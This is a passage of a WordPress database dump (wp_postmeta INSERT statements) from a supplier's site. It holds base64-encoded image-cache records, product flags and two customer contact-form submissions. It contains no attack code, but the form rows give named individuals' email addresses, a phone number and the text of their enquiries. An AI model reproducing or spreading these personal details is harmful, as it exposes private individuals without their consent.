INSERT INTO `wp_postmeta` VALUES (29103, 1822, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUzNzYyLCJpZCI6IjE4MjIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODk3LCJ0aW1lIjoxNDgzNTUzNzY1LCJpZCI6MTgyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC0xLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzgwLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI5NzMsInRpbWUiOjE0ODM1NTM3NjksImlkIjoxODIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtMS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjcwMSwidGltZSI6MTQ4MzU1Mzc3MiwiaWQiOjE4MjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTEtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc4MC0xLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEzMTg4LCJ0aW1lIjoxNDgzNTUzNzc2LCJpZCI6MTgyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzgwLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYwNCwidGltZSI6MTQ4MzU1Mzc3OSwiaWQiOjE4MjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc4MC0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTMsInRpbWUiOjE0ODM1NTM3ODMsImlkIjoxODIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTg5LCJ0aW1lIjoxNDgzNTUzNzg2LCJpZCI6MTgyMn1d'); 
INSERT INTO `wp_postmeta` VALUES (29104, 2797, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (29105, 2797, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (29106, 2797, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (29107, 3392, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (29108, 3392, '_seq_num', '204'); 
INSERT INTO `wp_postmeta` VALUES (29109, 3392, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (29110, 3392, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (29111, 3392, '_field_1', 'Tomas Krunkaitis'); 
INSERT INTO `wp_postmeta` VALUES (29112, 3392, '_field_10', 'Euro Design'); 
INSERT INTO `wp_postmeta` VALUES (29113, 3392, '_field_2', 'tomkrun@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (29114, 3392, '_field_8', '410-925-1729'); 
INSERT INTO `wp_postmeta` VALUES (29115, 3392, '_field_3', 'Looking to buy 50,000 Mt per year of this oil. Do you sell it on know anybody here in USA that would.\r\nThank you\r\nSPECIFICATIONS: CDRO DIN51605 in 30ppm\r\nPROPERTY\r\nACCEPTABLE LIMITS (Normal Oleic)\r\nUNITS\r\nSPECIFIC GRAVITY (20 2 C 2 )  0,918 - 0,923  д/сшЗ\r\nREFRACTIVE INDEX (40 2 C 2 )  1,461 -1,468  IRAM 5505\r\nSMOKE POINT  MIN +40C 2 C Q\r\nFLASH POINT  MIN +40C 2 C Q\r\nCOLOUR  RED (ON LOVIBOND CELL) \r\nCONSISTENCY  LIQUID VISCOUS +20C 2\r\nODOUR, TASTE  SPECIFIC FOR THIS PRODUCT \r\nQUALITY AND FOOD SAFETY PARAMETER  MAX \r\nPEROXIDE VALUE  2.5  meq/KG\r\nMOISTURE AND VOLATILE SUBSTANCES\r\n0,2%\r\nFREE FATTY ACID (As Oleic Acid)  0,75  %\r\nIODINE VALUE  118 -141  GJ2/100G\r\nINSOLUBLE IMPURITIES  0,05  %\r\nSOAP CONTENT  0,005  %\r\nSAPONIFICATION VALUE  188 -194  MG KOH/MG\r\nUNSAPONIFICATION MATTERS  &lt; 1.50  %\r\nTYPICAL FATTY ACID COMPOSITION  %\r\nC 14:0  &lt; 0,2 \r\nC 16:0  5,0 - 7,6 \r\nC 18:0  2,7&#039;6,5 \r\nC 18:1  14,0 - 39,4 \r\nC 18:2  48,3 - 74,0 \r\nC 18:3  &lt; 0,3 \r\nC 20:0  0,1 - 0,5 \r\nC 20:1  &lt; 0,3 \r\nC 22:0  0,3 -1,5\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (29116, 3392, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (29117, 3392, '_sub_id', '3392'); 
INSERT INTO `wp_postmeta` VALUES (29118, 3393, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (29119, 3393, '_seq_num', '188'); 
INSERT INTO `wp_postmeta` VALUES (29120, 3393, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (29121, 3393, '_field_12', 'Marina Prado'); 
INSERT INTO `wp_postmeta` VALUES (29122, 3393, '_field_13', 'Lider Aviação'); 
INSERT INTO `wp_postmeta` VALUES (29123, 3393, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (29124, 3393, '_field_14', 'marina.prado@lideraviacao.com.br'); 
INSERT INTO `wp_postmeta` VALUES (29125, 3393, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (29126, 3393, '_field_16', 'Dear all,\r\nI would like to know if the MS-730 meets any standard specification.'); 
INSERT INTO `wp_postmeta` VALUES (29127, 3393, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (29128, 3393, '_sub_id', '3393'); 
INSERT INTO `wp_postmeta` VALUES (29129, 789, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg'); 
INSERT INTO `wp_postmeta` VALUES (29130, 1821, 'wpfc_optimisation_reduction', '26402'); 
INSERT INTO `wp_postmeta` VALUES (29131, 1821, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTYyMTg1LCJpZCI6IjE4MjEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTA3LCJ0aW1lIjoxNDgzNTYyMTg4LCJpZCI6MTgyMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC0xLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUwLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMwODEsInRpbWUiOjE0ODM1NjIxOTIsImlkIjoxODIxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtMS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjcwNCwidGltZSI6MTQ4MzU2MjE5NSwiaWQiOjE4MjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC0xLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEzMTEwLCJ0aW1lIjoxNDgzNTYyMTk5LCJpZCI6MTgyMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUwLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYxOSwidGltZSI6MTQ4MzU2MjIwMywiaWQiOjE4MjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTMsInRpbWUiOjE0ODM1NjIyMDYsImlkIjoxODIxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTgyLCJ0aW1lIjoxNDgzNTYyMjEwLCJpZCI6MTgyMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC0xLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUwLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE5MDksInRpbWUiOjE0ODM1NjIyMTMsImlkIjoxODIxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC0xLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MTEsInRpbWUiOjE0ODM1NjIyMTYsImlkIjoxODIxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC0xLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1NDUsInRpbWUiOjE0ODM1NjIyMjAsImlkIjoxODIxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC0xLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NjMsInRpbWUiOjE0ODM1NjIyMjMsImlkIjoxODIxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC0xLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo5NjcsInRpbWUiOjE0ODM1NjIyMjcsImlkIjoxODIxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTEtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC0xLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6MzkxLCJ0aW1lIjoxNDgzNTYyMjMwLCJpZCI6MTgyMX1d'); 
INSERT INTO `wp_postmeta` VALUES (29132, 1820, 'wpfc_optimisation_reduction', '26265'); 
INSERT INTO `wp_postmeta` VALUES (29133, 1820, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLmpwZyIsIndpZHRoIjo0OTI4LCJoZWlnaHQiOjMyNjQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjIyMzUsImlkIjoiMTgyMCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMDQ4LCJ0aW1lIjoxNDgzNTYyMjM4LCJpZCI6MTgyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItODAweDUzMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItODAweDUzMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1w